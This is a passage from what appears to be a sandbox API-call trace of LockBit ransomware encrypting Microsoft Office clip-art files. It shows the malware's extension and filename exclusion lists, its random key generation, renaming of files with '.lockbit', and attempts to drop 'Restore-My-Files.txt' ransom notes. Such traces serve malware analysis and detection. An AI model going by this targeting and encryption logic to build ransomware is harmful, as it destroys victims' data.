(lpString1=".key", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01158_.WMF") returned 1 [0162.546] lstrcmpiW (lpString1="ntldr", lpString2="NA01158_.WMF") returned 1 [0162.546] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01158_.WMF") returned 1 [0162.546] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01158_.WMF") returned -1 [0162.546] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01158_.WMF") returned -1 [0162.546] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01158_.WMF") returned 1 [0162.547] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01158_.WMF") returned -1 [0162.547] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.547] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01158_.WMF") returned=".WMF" [0162.547] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.547] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.547] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.548] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.548] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.548] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.548] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.548] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.548] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.548] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.548] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.548] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.548] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01158_.WMF.lockbit") returned 72 [0162.548] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01158_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01158_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0162.554] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.554] malloc (_Size=0x40068) returned 0x3df0008 [0162.554] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7284) returned 1 [0162.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.555] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.558] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01158_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01158_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.558] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.558] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.559] free (_Block=0x1fa2ed8) [0162.559] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01158_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.559] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.559] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.559] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a370b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1694, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01161_.WMF", cAlternateFileName="")) returned 1 [0162.560] lstrcmpiW (lpString1=".", lpString2="NA01161_.WMF") returned -1 [0162.560] lstrcmpiW (lpString1="..", lpString2="NA01161_.WMF") returned -1 [0162.560] PathFindExtensionW (pszPath="NA01161_.WMF") returned=".WMF" [0162.560] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.560] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.561] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.561] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01161_.WMF") returned 1 [0162.561] lstrcmpiW (lpString1="ntldr", lpString2="NA01161_.WMF") returned 1 [0162.561] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01161_.WMF") returned 1 [0162.561] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01161_.WMF") returned -1 [0162.561] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01161_.WMF") returned -1 [0162.561] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01161_.WMF") returned 1 [0162.561] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01161_.WMF") returned -1 [0162.562] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.562] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01161_.WMF") returned=".WMF" [0162.562] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.562] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.562] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.563] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.563] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.563] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01161_.WMF.lockbit") returned 72 [0162.563] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01161_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01161_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.569] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.569] malloc (_Size=0x40068) returned 0x1ff1e60 [0162.569] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5780) returned 1 [0162.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0162.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0162.570] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.573] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01161_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01161_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.573] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.573] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.586] free (_Block=0x1fa2ed8) [0162.586] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01161_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.587] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.587] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.587] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f80000, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6a370b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x92f80000, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0xa04, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01164_.WMF", cAlternateFileName="")) returned 1 [0162.587] lstrcmpiW (lpString1=".", lpString2="NA01164_.WMF") returned -1 [0162.587] lstrcmpiW (lpString1="..", lpString2="NA01164_.WMF") returned -1 [0162.587] PathFindExtensionW (pszPath="NA01164_.WMF") returned=".WMF" [0162.587] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.587] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.587] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.587] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.587] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.587] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.587] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.587] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.587] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.587] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.587] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.587] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.588] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.588] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.589] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01164_.WMF") returned 1 [0162.589] lstrcmpiW (lpString1="ntldr", lpString2="NA01164_.WMF") returned 1 [0162.589] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01164_.WMF") returned 1 [0162.589] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01164_.WMF") returned -1 [0162.589] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01164_.WMF") returned -1 [0162.589] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01164_.WMF") returned 1 [0162.589] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01164_.WMF") returned -1 [0162.590] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.590] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01164_.WMF") returned=".WMF" [0162.590] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.590] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.590] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.591] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.591] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.591] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.591] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.591] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.591] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.591] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.591] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01164_.WMF.lockbit") returned 72 [0162.591] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01164_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01164_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0162.592] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.592] malloc (_Size=0x40068) returned 0x3d70450 [0162.592] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2564) returned 1 [0162.592] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0162.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0162.593] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.598] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01164_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01164_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.598] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.598] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.599] free (_Block=0x1fa2ed8) [0162.599] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01164_.WMF" | out: pszPath="C:\\\\Program 